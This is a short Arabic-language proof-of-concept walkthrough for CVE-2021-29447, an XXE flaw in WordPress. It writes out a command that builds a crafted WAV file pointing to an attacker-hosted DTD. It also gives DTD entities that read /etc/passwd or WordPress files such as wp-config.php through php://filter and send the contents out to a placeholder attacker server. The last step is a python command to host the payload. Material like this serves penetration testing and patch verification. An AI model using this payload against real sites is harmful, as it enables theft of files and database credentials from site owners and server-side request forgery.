
استغلال إثبات مفهوم لـ CVE-2021-29447، وهي ثغرة XXE في WordPress تتيح الكشف عن ملفات تعسفية و SSRF عبر ملفات WAV مصممة.
الكشف التعسفي عن الملفات: يمكن استرجاع محتوى أي ملف على نظام ملفات المضيف، مثل wp-config.php الذي يحتوي على بيانات حساسة مثل بيانات اعتماد قاعدة البيانات. تزوير الطلب من جانب الخادم (SSRF): يمكن إجراء طلبات HTTP نيابة عن تثبيت ووردبريس. اعتمادًا على البيئة، يمكن أن يكون لهذا تأثير خطير. استغلال الثغرة
تم تحديد موقع ووردبريس متأثر بهذه الثغرة أثناء عملية التعداد بمساعدة أداة wpscan.

الأمر سهل جدًا، في وحدة تحكم bash الخاصة بك
nano poc.wav
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSEVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
في جهاز المهاجم الخاص بك، قم بإنشاء ملف dtd مع الكود الذي سيتم تنفيذه على خادم الويب.
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >
ملاحظة: لقراءة ملفات ووردبريس استخدم الصيغة "../WP-FILE.php"
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../index.php">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >
استضف خادم بايثون لدليل الملفات (python3 -m http.server 8081)
https://github.com/motikan2010/CVE-2021-29447 https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5